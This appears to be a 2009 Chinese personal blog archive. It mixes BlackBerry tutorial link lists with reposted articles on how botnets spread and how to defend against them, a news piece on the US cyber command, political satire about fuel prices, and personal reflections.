http://bbs.maxpda.com/thread-128795-1-7.html
4.5 OS下 实现邮件推送 MSN GT等IM聊天 RSS等的魔橙
http://bbs.maxpda.com/thread-129842-1-1.html
推送 尚邮
http://www.shangmail.com/help.jsp
berrymail
www.berrymail.cn
139 Pushmail黑莓客户端使用详解
http://bbs.maxpda.com/viewthread.php?tid=180572
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
07-04-15
必须进网吧装黑莓软件的朋友 现在有解决方案了
http://bbs.maxpda.com/thread-45354-1-1.html
来一首《佛 求》 充满疑问的新手特别一定要来看
http://bbs.maxpda.com/thread-45704-1-1.html
BBer's SMS Manager,支持导出短信时附带发信收信人姓名
http://bbs.maxpda.com/viewthread.php?tid=29516
简单读取备份 ipd 文件里面的短信 IPD_SMS
http://bbs.maxpda.com/viewthread.php?tid=14271
BBer's AddressBook 批量添加联系人中文首字母
http://bbs.maxpda.com/viewthread.php?tid=29517
推荐使用【电话簿前加首字母】
http://bbs.maxpda.com/viewthread.php?tid=87227
~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~ 4.2ROM型号的 7130 8700 8100 8800 8300等推荐下列看书软件 ~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~
【看书新思路】我要看txt的 但是不想转换 这个想法可以啦 o(∩_∩)o...哈哈
http://bbs.maxpda.com/thread-89345-1-1.html
【兴奋推荐】50K大小的txt阅读软件 jread --字体 颜色 行距 书签
http://bbs.maxpda.com/thread-119192-1-1.html
AnyView测评新鲜出炉
http://bbs.maxpda.com/viewthread.php?tid=95327
【palm和BB双枪适用】用Mobipocket Reader6.0看电子书 详细安装使用教程
http://bbs.maxpda.com/viewthread.php?tid=22016
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
词典推荐
4.2ROM 不带扩展卡的推荐金山词霸
更高ROM 带扩展卡的推荐
支持扩展卡的最好用的词典jstardict,无限词典,不占内存。
http://bbs.maxpda.com/thread-116835-1-1.html
【参赛】【8800 TeeDict/jStarDict详细教程】
http://bbs.maxpda.com/thread-181076-1-1.html
★★★自带浏览器激活上网★★★
现在只有7230 7730 7290 7100等型号需要激活才可以实现自带浏览器上网
7290 7100 7105等型号,可以通过使用UCWEB 航海家 oprea等浏览器来上网则无需激活。
准备激活自带浏览器上网,请首先确认CMNET开通了,要用非常清晰的语言告知话务员将CMNET方式开通。电信公司可能会告知说你这个号码可以用CMNET上网,资费是多少等等,但是默认的都是没有开通的。你没有主动要求开通他也就懒得不说。
如果要收发彩信或者自带浏览器上网就必须激活那么
全球首发,7100,7290,7230 激活自带浏览器终结教程
http://bbs.maxpda.com/viewthread.php?tid=173001
否则建议
http://bbs.maxpda.com/thread-110706-1-1.html
BB上网激活小技巧:换电池后轻松激活
http://bbs.maxpda.com/viewthread.php?tid=46511
7290们,来!使7290免激活。其它7xxx的也来围观吧
http://bbs.maxpda.com/thread-228038-1-1.html
★★★基本知识★★★
BB基础知识概念汇总和常见问题
http://bbs.maxpda.com/viewthread.php?tid=17245
告诉你什么是真正的pushmail
http://bbs.maxpda.com/thread-30413-1-1.html
史上最全Vendor ID运营商代码~~~
http://bbs.maxpda.com/viewthread.php?tid=15688
所有准备买黑莓的必看,7290 7730等经典型号的详细对比图
http://bbs.maxpda.com/viewthread.php?tid=3906
16M的7230 和7730 到底选择哪一个[大量实物对比图]
http://bbs.maxpda.com/viewthread.php?tid=27353
对比一下7100与7290
http://bbs.maxpda.com/thread-47839-1-1.html
RIM新款键盘PDA手机BlackBerry 7130g[实物照片]
http://bbs.maxpda.com/viewthread.php?tid=25644
BlackBerry Pearl 8100 黑色珍珠 实物鉴赏
http://bbs.maxpda.com/thread-40568-1-1.html
【真机欣赏】pearl 8120 --200W拍照 录象 WIFI 首款内置中文输入的suretype机型
http://bbs.maxpda.com/viewthread.php?tid=121822
【黑莓机型介绍】BlackBerry 8700v GSM 四频手机介绍+写真+资源
http://bbs.maxpda.com/viewthread.php?tid=54951
首款支持3G网络的BlackBerry黑莓8707 PDA手机靓丽登场
http://bbs.maxpda.com/thread-54029-1-1.html
【黑莓机型介绍】BlackBerry 8800新加的 GPS 及地�定位功能
http://bbs.maxpda.com/viewthread.php?tid=54994
黑莓8800 VS 8310 实物比较
http://bbs.maxpda.com/thread-160958-1-1.html
黑莓 8900Curve vs 9000Bold 缺点/优点互评...
http://bbs.maxpda.com/viewthread.php?tid=198053
★★★基础教程类★★★
黑莓是智能手机 不是MP3 不是U盘 所以不是联机到电脑就会如何的有什么反应,你必须先在电脑上安装桌面管理器
【图文】BB到手第一件事-下载并安装桌面软件
http://bbs.maxpda.com/viewthread.php?tid=3596
推荐经典的4.2.1.13 所有黑莓型号都可以用
http://down.maxpda.com/download/software-159.html
解决bb桌面windows installer 错误 无法安装
http://bbs.maxpda.com/viewthread.php?tid=16496
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
【图文】新手不建议-刷ROM装汉化【全面修订】
http://bbs.maxpda.com/viewthread.php?tid=3607
【图文】BB到手第三件事-装软件与删除软件
http://bbs.maxpda.com/viewthread.php?tid=3608
alx 文件自动生成工具【+30分 +精华】更新
http://bbs.maxpda.com/viewthread.php?tid=5554
推荐用winloader进行卸载安装
http://bbs.maxpda.com/viewthread.php?tid=74444
【图文】BB到手第四件事-电话 短信操作【Q群问题精华集合】
http://bbs.maxpda.com/viewthread.php?tid=3668
【图文】如何安装主题和应用主题以及删除主题
http://bbs.maxpda.com/viewthread.php?tid=5523
BB 7100v主题模块相关性彻底研究_默认主题篇
http://bbs.maxpda.com/viewthread.php?tid=124452
【同步教程】BB与OUTLOOK同步联系人、日历、备忘、任务等PIM
http://bbs.maxpda.com/viewthread.php?tid=5204
【没有法子 必须写 也希望能仔细看】联系人分类图文教程
http://bbs.maxpda.com/viewthread.php?tid=18263
【新手入门】配置文件(情景模式)使用教程
http://bbs.maxpda.com/viewthread.php?tid=20218
电话铃声 短信铃声 个性铃声如何设置? 2009.2.26
http://bbs.maxpda.com/thread-202856-1-1.html
【技巧图文教程】之移动图标、隐藏图标 居然可以加密短信 ^_^
http://bbs.maxpda.com/viewthread.php?tid=22576
07-04-07
瘦!瘦!瘦!想怎么瘦就怎么瘦 {瘦身帖子大汇集}
http://bbs.maxpda.com/thread-48026-1-1.html
【图文教程】7100系列的黑莓中文输入法的安装和使用
http://bbs.maxpda.com/viewthread.php?tid=18424
7100T V X G 出货前看我做了些什么【全面修订】
http://bbs.maxpda.com/viewthread.php?tid=17760
菜鸟级别轻松WIPE自己的BB
http://bbs.maxpda.com/viewthread.php?tid=5808
【图文教程】WIPE机器 然后强行刷机
http://bbs.maxpda.com/viewthread.php?tid=6517
我开手机 但就是不想接电话 哈哈【图文教程】
http://bbs.maxpda.com/viewthread.php?tid=5810
[+40分]BBScreen 最方便的 BB 抓图工具
http://bbs.maxpda.com/viewthread.php?tid=9375
[原创] 通过BB和电脑连接让电脑上网<图文教程>
http://bbs.maxpda.com/viewthread.php?tid=21888
清晰明了,全图解说,用7290当modem让笔记本上网!
http://bbs.maxpda.com/thread-54129-1-1.html
QUOTE:
原帖由 allen.z 于 2008-4-14 17:38 发表
感谢以上作者对我的帮助,但是碰见个问题以上教程都没有说明,我在电脑的 设备管理器 中无法找到 调制解调器,重装了两个版本的dm都没有解决,后来有朋友说可能是系统的问题,我开始尝试手工安装 xp的调制解调器,但是可能是我安装系统是用的是ghost,在列表中没有调制解调器,所以先从网上下一个标准的调制解调器,这里的附件太小,不能上传,各位朋友可以百度一下“xp自带Modem驱动”,下载,然后安装后com选黑莓的rim用的com口,安装完成后按照 以上教程,建立连接,
安装后能拨号,但是拨号后验证是发现 734 错误号,这个错误以前用nokia手机做猫也发现过,我下sim卡,用原来手机查看 调制解调器的额外初始化命令发现和其他教程 调制解调器中 的 额外初始化命令 有误,修改为:“AT+CGDCONT=,,"cmnet"<cr> ”(引号内的内容),再次换手机重新连接,682 硬件错误, 发现dm没有开,因为原来nokia手机不用开 手机管理器能上,再开dm,重新连接,一切正常!!!如果网友用的cmwap方式上网 ,把 初始化命令中 cmnet 改 cmwap 即可。。。。。写以上教程希望对各位有帮助!谢谢!!
★★★输入相关类★★★
最强完美五笔字型(全键盘)
http://bbs.maxpda.com/viewthread.php?tid=190496
黑莓五笔字型输入法使用说明
http://bbs.maxpda.com/viewthread.php?tid=104608
【桌面管理器-备份恢复-高级-打开这个ipd 恢复即可 切换到英文输入法状态可以使用五笔编码输入中文】
7100系列黑莓五笔中文输入法(附软件)
http://bbs.maxpda.com/viewthread.php?tid=19494
【图文教程】7100系列的黑莓中文输入法的安装和使用
http://bbs.maxpda.com/viewthread.php?tid=18424
07-03-02
黑莓笔画输入法V1.0.4
http://bbs.maxpda.com/thread-38573-1-1.html
和大家分享一下BB拼音输入法的几个发现
http://bbs.maxpda.com/viewthread.php?tid=4090
黑莓上的五笔画输入法使用图文教程
http://bbs.maxpda.com/viewthread.php?tid=3908
★★★墙纸主题铃声类★★★
特别注意:
7230 7290 7730 支持单音midi格式作为铃声
7100系列 7105 支持adp格式真人真唱
7130 8700 8100 8800 8300等机型直接使用4.2版本的桌面管理器的媒体管理器的功能直接传输mp3格式即可
BB铃声图片编辑工具:无须JDK或.net framework,类资源管理器界面
http://bbs.maxpda.com/viewthread.php?tid=27000
如此简单---使用“IPDManager”扩展BB的**图铃世界**图文教程---新手专用
http://bbs.maxpda.com/thread-71291-1-1.html
让自己的铃声、图片炫起来!idp制作【+20分】
http://bbs.maxpda.com/viewthread.php?tid=13359
一步一步教新手上传铃声和图片(完整详细简单版)
http://bbs.maxpda.com/viewthread.php?tid=47721
2009年7月20日星期一
黑莓blackberry与google
2009年7月16日星期四
botnet僵尸网络的建立方法
(2)邮件病毒。bot程序还会通过发送大量的邮件病毒传播自身,通常表现为在邮件附件中携带僵尸程序以及在邮件内容中包含下载执行bot程序的链接,并通过一系列社会工程学的技巧诱使接收者执行附件或点击链接,或是通过利用邮件客户端的漏洞自动执行,从而使得接收者主机被感染成为僵尸主机。
(3)即时通信软件。利用即时通信软件向好友列表发送执行僵尸程序的链接,并通过社会工程学技巧诱骗其点击,从而进行感染,如2005年年初爆发的MSN性感鸡(Worm.MSNLoveme)采用的就是这种方式。
(4)恶意网站脚本。攻击者在提供Web服务的网站中在HTML页面上绑定恶意的脚本,当访问者访问这些网站时就会执行恶意脚本,使得bot程序下载到主机上,并被自动执行。
(5)特洛伊木马。伪装成有用的软件,在网站、FTP 服务器、P2P 网络中提供,诱骗用户下载并执行。
如何检测防范僵尸网络
僵尸网络(Botnet)是指多台被恶意代码感染、控制的与互联网相连接的计算机。Botnet正成为一种日益严重的威胁,不过,只要我们用好对付它的六把利剑,僵尸网络就难以造成严重的祸患。
第一剑:采用Web过滤服务
Web过滤服务是迎战僵尸网络的最有力武器。这些服务扫描Web站点发出的不正常的行为,或者扫描已知的恶意活动,并且阻止这些站点与用户接触。
Websense、Cyveillance 、FaceTime都是很好的例子。它们都可以实时地监视互联网,并查找从事恶意的或可疑的活动的站点,如下载JavaScript或执行screen scrapes等正常Web浏览之外的其它骗局。Cyveillance 和Support Intelligence还提供另外一种服务:通知Web站点操作人员及ISP等恶意软件已经被发现,因此黑客攻击的服务器能被修复,他们如是说。
第二剑:转换浏览器
防止僵尸网络感染的另一种策略是浏览器的标准化,而不是仅仅依靠微软的Internet Explorer 或Mozilla 的Firefox。当然这两者确实是最流行的,不过正因为如此,恶意软件作者们通常也乐意为它们编写代码。同样的策略也适用于操作系统。据统计,Macs很少受到僵尸网络的侵扰,正如桌面Linux操作系统,因为大多数僵尸的罪魁祸首都把目标指向了流行的Windows。
第三剑:禁用脚本
另一个更加极端的措施是完全地禁用浏览器的脚本功能,虽然有时候这会不利于工作效率,特别是如果雇员们在其工作中使用了定制的、基于Web的应用程序时,更是这样。
第四剑:部署入侵检测和入侵防御系统
另一种方法是调整你的IDS(入侵检测系统)和IPS(入侵防御系统),使之查找有僵尸特征的活动。例如,重复性的与外部的IP地址连接或非法的DNS地址连接都是相当可疑的。虽然难于发现,不过,另一个可以揭示僵尸的征兆是在一个机器中SSL通信的突然上升,特别是在某些端口上更是这样。这就可能表明一个僵尸控制的通道已经被激活了。您需要找到那些将电子邮件路由到其它服务器而不是路由到您自己的电子邮件服务器的机器,它们也是可疑的。僵尸网络的专家Gadi Evron进一步建议,您应该学会监视在高层对Web进行访问的家伙。它们会激活位于一个Web页面上的所有的链接,而一个高层次的访问可能会指明一台机器正被一个恶意的Web站点所控制。
一个IPS或IDS系统可以监视不正常的行为,这些行为指明了难于发现的、基于HTTP的攻击和来自远程过程的攻击、Telnet和地址解析协议(即ARP)欺骗等等。然而,值得注意的是,许多IPS检测器使用基于特征的检测技术,也就是说,这些攻击被发现时的特征被添加到一个数据库中,如果数据库中没有有关的特征就无法检测出来。因此,IPS或IDS就必须经常性的更新其数据库以识别有关的攻击,对于犯罪活动的检测需要持续不断的努力。
第五剑:保护用户生成的内容
还应该保护你的WEB操作人员,使其避免成为“稀里糊涂”的恶意软件犯罪的帮凶。如果你并没有朝着WEB 2.0社会网络迈进,你公司的公共博客和论坛就应该限制为只能使用文本方式,这也是Web Crossing的副总裁Michael Krieg的观点,他是社会化网络软件和主机服务的创造者。
Krieg 说,“我并不清楚我们成千上万的用户有哪一个在消息文本中允许了JavaScript,我也不清楚谁在其中嵌入了代码和其它的HTML标签。我们不允许人们这样做。我们的应用程序在默认情况下要将这些东西剥离出去。”
Dan Hubbard是Websense安全研究的副总裁,他补充说,“那是用户创建内容站点的一个严重问题,即Web 2.0现象。你怎么才能在允许人们上传内容的强大功能与不允许他们上传不良的东西之间寻求平衡呢?”
这个问题的答案是很明确的。如果你的站点需要让会员或用户交换文件,就应该进行设置,使其只允许有限的和相对安全的文件类型,如那些以.jpeg或mp3为扩展名的文件。(不过,恶意软件的作者们已经开始针对MP3等播放器类型,编写了若干蠕虫。而且随着其技术水平的发现,有可能原来安全的文件类型也会成为恶意软件的帮凶。)
第六剑:使用补救工具
如果你发现了一台被感染的计算机,那么一个临时应急的重要措施就是如何进行补救。像Symantec等公司都宣称,他们可以检测并清除即使隐藏最深的rootkit感染。Symantec在这里指明了Veritas和VxMS(Veritas Mapping Service)技术的使用,特别是VxMS让反病毒扫描器绕过Windows 的文件系统的API。(API是被操作系统所控制的,因此易于受到rootkit的操纵)。其它的反病毒厂商也都试图保护系统免受rootkit的危害,如McAfee 和FSecure等。
不过,Evron认为,事后进行的检测所谓的恶意软件真是一个错误!因为它会使IT专家确信他们已经清除了僵尸,而其实呢,真正的僵尸代码还驻留在计算机上。他说,“反病毒并非是一个解决方案,因为它是一个自然的反应性的东西。反病毒能够识别有关的问题,因而反病毒本身也会被操纵、利用。”
这并不是说你不应该设法实施反病毒软件中最好的对付rootkit的工具,不过你要注意这样做就好似是在你丢失了贵重物品后再买个保险箱而已。用一句成语讲,这就叫做“亡羊补牢”。Evron相信,保持一台计算机绝对安全干净、免受僵尸感染的方法是对原有的系统彻底清楚,并从头开始安装系统。
不要让你的用户访问已知的恶意站点,并监视网络中的可疑行为,保护你的公共站点免受攻击,你的网络就基本上处于良好状态。这是安全专家们一致的观点。
可以注意到,如果一个网络工作人员对于网络安全百思不得其解,并会油然而生这样一种感觉,‘我应该怎么对付这些数以百万的僵尸呢?’。”其实,答案非常简单。正如,FaceTime 的恶意软件研究主管Chris Boyd所言,“只需断开你的网络,使其免受感染─病毒、木马、间谍软件或广告软件等……。将它当作一台PC上的一个流氓文件来进行清除(不过,谁又能保证真正清除干净呢?)。这就是你需要做的全部事情。”
关于botnet僵尸网络
刚刚看了Symantec 赛门铁克公司三月份最新发布的互联网安全报告。有这么一组数据令人震惊。[1]
北京市是全球感染Bot计算机数目最多的城市,占总感染量的5%
中国是全球感染Bot计算机数目最多的国家或地区,占总感染量的26%
美国是全球拥有Botnet控制中心最多的国家或地区,占40%。
这组数据的背后的含义是什么?要回答这一点,我们先看看什么是Bot?什么是Botnet?
二 Bot/Botnet
目前对Botnet没有特别权威的翻译。有许多翻译为“僵尸网络”,实际上并不完全准确。“僵尸网络”实际上是“zombie network”的翻译,它是比喻恶意Botnet的表现形式。还有的翻译为“波特网”或“机器人网络”。在本文中,为了避免混淆,将直接使用Bot和Botnet。
Bot,这个词是从“Robot”这个词变化来的,用来指在互联网上,可以自动执行特定任务的软件程序。[2] 这些特定的任务可以是在网络上查询特定信息,报告天气,参加网络竞拍等等。
但是,对于一个恶意的Bot来说,执行的任务就会变成:
散布病毒,间谍软件或广告软件
发送垃圾邮件
网络访问代理
执行DDOS攻击
窃取敏感信息,如银行密码
自动拨号
等等
本文以下的Bot均指的是恶意的Bot。
Botnet,顾名思义,就是由若干Bot(感染Bot的计算机)构成的网络。在网络中,存在一个控制中心(Command and control center)。每台感染Bot的计算机一般通过Internet Relay Chat(IRC)方式与控制中心建立连接,接受来自控制中心的指令。这样,攻击者就可以通过控制中心,集中管理Botnet内的所有机器。也就是说,一台感染Bot的计算机,它的一举一动都可以被远程监控和控制,如同僵尸(zombie)一般。这就是Zombie Network这个词的来历。
推动Botnet发展的因素之一就是实在的经济利益,钱。一个Botnet的控制者,可以和广告软件的发布者合作,以增加相应站点的点击率;可以和垃圾邮件的发布者合作,一次发布成千上万封的垃圾邮件;或者是DDOS攻击,如网络勒索。就像强收保护费一样。如果一个中小型网站不付钱的话,就让Botnet控制的所有机器都恶意访问这个网站,以打乱其正常的商务活动。
Bot攻击实例分析
我们来看看一个典型的Bot是如何攻击普通用户的。Rbot是目前最为流行的Bot攻击程序之一。它是如何运作的?
第一步:远程攻击存在安全漏洞的机器
常见被Rbot利用的安全漏洞有:
DCOM RPC 安全漏洞(Microsoft安全通告MS03-026)
UPnP安全漏洞(Microsoft安全通告MS01-059)
LSASS安全漏洞(Microsoft安全通告MS04-011)
等等
另外一种常见的攻击方式是通过社会工程,例如作为一个电子邮件的附件发送给用户,或者通过IM让用户下载。
第二步,加入Botnet
一旦Rbot开始运行,它就会有以下几个动作:
将自身加入到系统自动运行的程序中。例如,在
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run,创建相应的注册表信息,这样每次系统启动,它都会自动被执行。
关闭某些特定程序,如防火墙,系统自动更新。
连接IRC服务器,即Botnet的控制中心。
扫描其他机器,以测试是否可以被成功攻击。
第三步,接受来自Botnet控制中心的指令
一个Rbot可以接受的控制指令。
更新Rbot版本
窃取密码
访问特定http站点
屏幕截图
报告系统信息
开启shell
执行特定程序
等等
三 数据背后的含义
回顾一下Symantec报告中的数据。
北京市是全球感染Bot计算机数目最多的城市,占据总感染量的5%。中国是全球感染Bot计算机数目最多的国家或地区,占据总感染量的26%。
作为对比,美国是全球感染Bot计算机数目的第二位,占据总感染量的14%。
根据报告,Symantec 全球检测到6049594台感染Bot的计算机。那么,北京就有三十万左右,中国就有一百五十万台左右感染Bot的计算机。
另一方面,我们知道,感染了Bot的计算机是被其加入的Botnet的控制中心完全控制的。美国是全球拥有Botnet控制中心最多的国家或地区,占40%。作为对比,中国的控制中心比例是5%,列第四位。
这就意味着在国内大部分被感染了Bot的计算机是被国外的控制中心所控制。这里需要指明的一点是,一个Botnet的控制中心设在美国,并不意味着Botnet的控制者本身就在美国。一个来自东欧的攻击者完全可以通过一个在美国的控制中心来控制一台在德国的机器。另一个角度来说,国内的普通用户,由于配套的安全措施和安全意识的不足,已经成为全世界有组织的计算机犯罪团体的目标。一个标志是源自国内的垃圾邮件的发送量不断增加,这与国内感染了Bot的计算机的数目增加不无关系。
随着越来越多的国内普通用户使用宽带连接,我们可以预测国内感染了Bot的计算机的数目在近几年内还会不断增加。
四 总结
国内高速互联网的迅速发展,给越来越多的普通用户带来便利的同时,也同时带来了风险。相应的安全保护措施,普通用户的安全意识和教育的培训,都远远没有跟上。中国已经成为全球感染Bot计算机数目最多的国家。
希望这篇文章可以敲响用户的安全警钟。
五 参考文献
1, Symantec Internet Security Threat Report, Trends for July–December 06
http://eval.symantec.com/mktginfo/enterprise/white_papers/ent-whitepaper_internet_security_threat_report_xi_03_2007.en-us.pdf
2, Internet Bot, http://en.wikipedia.org/wiki/Internet_bot
原文链接: http://blog.csdn.net/chengyun_chu/archive/2007/03/24/1540035.aspx
2009年7月11日星期六
2009年的中国油价
石油\石化: 调完了,大哥.
发改委: 有什么反映?
石化: 意见很大,骂娘的挺多,比国外贵太多了….
发改委: 不是让你们找枪手造舆论吗?
石油\石化: 找了,强调成本构成不同没有可比性,中国特色什么的,不过越描越黑,现在他们有点顶不住了,不敢说话了.
发改委: 能不能说点新鲜的?我听了都烦.以后不要找什么草包专家,更不要找”五毛”骂街.咱不差钱,还是让那几个刀枪不入的上吧.
石油\石化: 可他们名声太差了吧….连”自行车比汽车污染更严重”这类话也说得出口….
发改委: 靠,他都不怕,你担心什么?
石油: 是,大哥.我觉得根本就多余解释,就涨了,你能怎么着吧,还能造反不成?!
发改委: 头脑简单!不讲政治!跟你们说了多少次了?对了,销售稳定吗?
石化: 大哥,销售这几天一直在下滑…..
发改委(暴怒): 怎么会这样?!都是精算过的,汽车保有量低时低油价,打开口子让这帮孙子使劲买,三年功夫该买的都买了,一家两三辆都有了,套牢以后咱就一路涨上去.这么大市场销售怎么会下滑?
石化: 内外差价太大了,外面的油品好,价格也比我们低2块多.最近成品油走私很火,以前贩毒\倒腾军火的也改行做成品油了…..
发改委: 妈的,敢挡咱们的财路?把他们都给我做了!
石油: 大哥,要是几个小瘪三也就好办了,现在部队用军舰在走,我们有什么办法?
发改委: 靠,部队我也管不了,我找老大说去….底下兄弟们怎么样?
石油: 兄弟们日子过得很滋润,不过情绪不太稳定..
发改委: 为什么?!
石化: 兄弟都觉得探油\炼油太辛苦了,也没必要,买船运油就行了……
发改委: 嘘---,小声,别让FBI听到,他们也涨价就麻烦了…..这事低调操作就行了,闷声发大财.
石油: 除了走私,还有一个原因,就是好多小白领觉得油太贵,开始”戒驾”了…
发改委: 找几个抢手,多推推节油概念,多推推日本车….不信他们真能戒.
石化: 这帮孙子也不是真想戒,主要是吃不住劲了.房价学费那么高……
发改委: 别说了,TMD,这帮孙子是逼我下重手啊….
石油: 大哥,你的意思是?
发改委: 这帮孙子够狠,先是把烟戒了让我损失一笔,现在又要”戒驾”?!看来,得把十年后的手段提前用上了,咱们看谁更狠?下月我找人听证一下水价….草,让他们戒!
2009年7月1日星期三
对网站提供的安全服务
并不是完整的安全服务,只是应急类的服务。发现被入侵,赶紧找到我,看看是什么原因进入的,如何防护,预防并避免下一次入侵,就是这样的服务,也挺折腾人的。
小公司基本在安全投入上,很是有一分钱掰八瓣的花活,但入侵事件有时却让他们的营收雪上加霜,很致命的打击。当然也有一些无所谓的,
2009年6月27日星期六
任何的风吹草动,都可以预示一些将要发生的东西
6.25晚上18:00-24:00左右,中国电信几个省市大面积网络故障,据说是某骨干路由出问题了,但是不是某种网络战的准备,也不好说啊。任何的风吹草动,都可以预示一些将要发生的东西。
看看这个文章。虽然早就听说过美国的网络战司令部,但现在可是正式成立了,而且还这么大张其鼓的,是不是象某种核威胁,告诉其他国家,要听话,要看美国的脸色行事,否则会"悄悄地进村,打枪地不要",不知不觉就把你收拾了。
评估威胁 整合资源 加速建设 准备网战
美军组建网络战司令部争夺制网权
日期:2009-06-25 作者:王晨曦;王凤岭 来源:新民晚报
王晨曦 王凤岭
也许人们还会记得伊拉克战争中的美军"网络中心战"吧。时至今日,美军网络战水平已今非昔比。
美军在所谓外部"威胁"的招牌下,积极开展网络战的研究与改革,调整军队编制,组建新型部队,发展新式装备,整合各种网战资源,其争夺制网权的能力不断提高。
A 评估国家网络安全
早在1988年11月2日,美国23岁的研究生莫里斯制造的计算机"病毒"程序进入美国国防部战略系统的主控中心和各级指挥中心,使8500台军用计算机出现各种异常,其中6000部计算机无法正常运行,直接经济损失达上亿美元。
2003年美国国防部、国务院、能源部、国土安全部网站遭非法入侵事件达5.4万起,2004年飙升至7.9万起。
美国2006年发表的一项报告称,美国国防部计算机系统上年度遭到黑客袭击达2万多次。另据媒体报道,为对付黑客,美国防部每年要付出300多亿美元。
5月29日,奥巴马批准公布了国家网络安全评估报告,指出来自网络空间的威胁已成为美国面临的最严重的经济和军事威胁之一。
奥巴马表示:网络空间及其带来的威胁都是真实的,保护网络基础设施将是维护美国国家安全的第一要务。这份评估报告,源于奥巴马上任不久的一个指令:对美国的网络安全状况进行为期60天的全面评估,分析美国网络面临的威胁,检查联邦政府部门保护机密信息和数据的措施是否完善。
B 全面组建网络部队
伊拉克战争爆发前,美军就组建了网络战部队,只不过规模不大而已。战后,美军在2005年组建了专门负责网络作战的"网络战联合功能构成司令部",而且陆海空军和战略司令部都设有"网军"。
美国已拥有最大的网络战力量,三军都有网络部队。近日,美军战略司令部司令凯文・希尔顿将军公开承认,战略司令部正在征召2000~4000名士兵(黑客),组建一支"特种部队"。据防务专家乔尔・哈丁评估,美军共有3000~5000名信息战专家,5~7万名官兵涉足网络战,规模相当于7个101空降师。
目前,美空军的688信息作战联队和67网络作战联队、450电子作战联队、689网络战术联队都已具备很强的作战能力。
按计划,美军的网络战部队将于2030年前后组建完毕,全面担负起网络攻防任务,以确保美军在未来战争中拥有全面的信息优势。
C 构架新网络战司令部
2007年9月18日,美国空军部长迈克尔・温当天宣布成立一个临时网络战司令部,以应对将来可能出现的互联网战争。这个司令部将是奥巴马下决心成立的新网络战司令部的前身。
目前,美国国防部正在筹建这个新的网络战司令部。网络战司令部将成为与空军作战司令部、太空司令部平级的单位,由一名四星上将或三星将军领导,指挥所有从事网络战的美军人员。这些人员的主要工作是渗入敌方网络系统窃取绝密数据,在对方网络内置入程序,以便在战时摧毁敌方指挥控制系统。
据报道,网络战司令部麾下有多达541个子司令部、65个空军中队、预备役和国民警卫队、4个空军网络战联队和陆、海军网络战部队。
D 研发各种网络战武器
目前,在美国军界谈得最多的是两个字"威胁",应对威胁、消除威胁是美军网络战司令部的首要任务。而在白宫政界,正在开展网络安全政策和行动、对民众开展网络安全教育、制定网络安全事件应急计划,以修建一堵巨大的网络防火墙。
美军大张旗鼓地组建网络战司令部,实际上是承认美国已拥有越来越多的网络战武器,并为未来使用这些武器制造舆论。
美军在网络战武器装备的研发方面,依然是世界各国军队的"领头羊"。在软杀伤网络战武器方面,已经研制出2000多种计算机病毒武器,如"蠕虫"程序、"特洛伊木马"程序、"逻辑炸弹"、"陷阱门"等。
在硬杀伤网络战武器方面,已研制成或正在发展电磁脉冲弹、次声波武器、激光反卫星武器、动能拦截弹和高功率微波武器,可对别国网络的物理载体进行攻击。
眼下,美国空军第8航空队,正在试验各种现有网络战武器的效能。据悉,第8航空队由信息战、情报、侦察、空中控制、电子战等9个联队组成,是专门负责网络战进攻的部队。
E 未来实施三种网络战
早在2001年7月,美国国防部就提出了"网络中心战"的概念,并在2003年的伊拉克战争中付诸实施。
网络战中"病毒"之类的作战武器在释放之后,将无法控制,可彻底破坏敌人发动和维持战争的战略资源,可崩溃敌人的战斗精神和意志;网络战的胜利不是以大量的生命为代价,战争的附带毁伤小。因此,美军在发展网络防御能力的同时,更重视网络进攻能力。据悉,美军网络战司令部的近期任务是防范网络攻击,长期任务是实施三种网络战:
一是网络盗窃战。即找到对方网络漏洞,破解文件密码,盗出机密信息。
二是网络舆论战。即通过媒体网络,编造谎言、制造恐慌和分裂,破坏对方民心士气。
三是网络摧毁战。即运用各种"软"、"硬"网络攻击武器,进行饱和式攻击,摧毁对方政府、军队的信息网络。
事实上,迄今为止世界上还没有发生过一次势均力敌的真正意义上的全面的网络战。以往的网络战,总是一边倒的非对称战。
美军何以重视网络战?因为网络战具有十分显著的效能:网络已经成为提升军队作战能力的"倍增器",如同制海权、制空权、制天权一样,争夺制网权已逐渐演变成为美军维持军事优势的重要组成部分。
2009年6月26日星期五
2009年6月24日星期三
2009年6月10日星期三
2009年6月4日星期四
2009年6月初,多个国外网站无法访问
<br>
当然,这个博客空间也无法访问和更新,只能通过绕过这些控制措施,才能把这些消息发上来。
<br>
有时想,期望中的希望,何时才能到来?我们的明天还有希望吗?这个小区里有50多个刚出生的小孩,我也经常陪着孩子在园子里玩儿,感觉这一切都是从上一辈传承下来的,包括中国人的性格和行事方法,都有着上一代人,甚至几千来的一些不良习惯的影响,压制、恐吓、不安全感,深深地印在每个中国人的骨子里。未来的希望在哪里?
2009年5月30日星期六
职场日记的回忆
虽然技术一直在进步,朋友一直在增多,但自己职业发展的路途,发生了重大的转变,08年我决定去冒险,是迫于形势所副无奈的选择。现在看,03年到08年,一直在痛苦和失败中度过。
从我的长处看,我的技术不错,甚至在某些方面可达到国内前列,业务也很精通,管理也有些经验,也很有人缘,为什么一直没提上去呢?传统的教育害了我啊,让我远离争权夺利,只要一有斗争,就跑的远远的,实际上这是对自己对公司的不负责。真正有才能的人,要去争取更高的职位,才能发挥更大的作用。要是自己不去争取,最后上去的都是善于勾心斗角却毫无才能,善于溜须拍马却从不干活的人,这样的人集中到了高管层,最后只会对公司对事业有害无益。自己最大的问题,就是没有任何争取,把这一切看在眼里,只顾在日记里发发牢骚,一直逆来顺受。
